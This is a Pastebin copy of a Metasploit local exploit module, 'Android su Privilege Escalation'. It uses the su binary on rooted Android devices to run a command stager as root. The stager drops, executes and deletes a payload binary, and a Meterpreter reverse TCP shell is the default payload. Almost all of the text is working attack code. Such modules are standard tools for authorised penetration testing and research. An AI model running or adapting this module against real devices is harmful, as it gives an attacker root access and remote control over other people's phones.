SHARE
TWEET

su_exec.rb

a guest Jul 18th, 2019 65 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. class MetasploitModule < Msf::Exploit::Local
  7.   Rank = ManualRanking
  8.  
  9.   include Msf::Exploit::CmdStager
  10.   include Msf::Post::File
  11.   include Msf::Post::Android::Priv
  12.  
  13.   def initialize(info={})
  14.     super( update_info( info, {
  15.       'Name'           => "Android 'su' Privilege Escalation",
  16.       'Description'    => %q{
  17.           This module uses the su binary present on rooted devices to run
  18.           a payload as root.
  19.           A rooted Android device will contain a su binary (often linked with
  20.           an application) that allows the user to run commands as root.
  21.           This module will use the su binary to execute a command stager
  22.           as root. The command stager will write a payload binary to a
  23.           temporary directory, make it executable, execute it in the background,
  24.           and finally delete the executable.
  25.           On most devices the su binary will pop-up a prompt on the device
  26.           asking the user for permission.
  27.       },
  28.       'Author'         => 'timwr',
  29.       'License'        => MSF_LICENSE,
  30.       'DisclosureDate' => 'Aug 31 2017',
  31.       'SessionTypes'   => [ 'meterpreter', 'shell' ],
  32.       'Platform'       => [ 'android', 'linux' ],
  33.       'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
  34.       'Targets'        => [
  35.         ['aarch64',{'Arch' => ARCH_AARCH64}],
  36.         ['armle',  {'Arch' => ARCH_ARMLE}],
  37.         ['x86',    {'Arch' => ARCH_X86}],
  38.         ['x64',    {'Arch' => ARCH_X64}],
  39.         ['mipsle', {'Arch' => ARCH_MIPSLE}]
  40.       ],
  41.       'DefaultOptions' => {
  42.         'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
  43.         'WfsDelay' => 5,
  44.       },
  45.       'DefaultTarget'  => 0,
  46.       }
  47.     ))
  48.     register_options([
  49.       OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
  50.       OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
  51.     ])
  52.   end
  53.  
  54.   def base_dir
  55.     datastore['WritableDir'].to_s
  56.   end
  57.  
  58.   def su_bin
  59.     datastore['SU_BINARY'].to_s
  60.   end
  61.  
  62.   def exploit
  63.     if is_root?
  64.       fail_with Failure::BadConfig, 'Session already has root privileges'
  65.     end
  66.  
  67.     linemax = 4088 - su_bin.size
  68.     execute_cmdstager({
  69.       flavor: :echo,
  70.       enc_format: :octal,
  71.       prefix: '\\\\0',
  72.       temp: base_dir,
  73.       linemax: linemax,
  74.       background: true,
  75.     })
  76.   end
  77.  
  78.   def execute_command(cmd, opts)
  79.     su_cmd = "#{su_bin} -c '#{cmd}'"
  80.     cmd_exec(su_cmd)
  81.   end
  82.  
  83. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top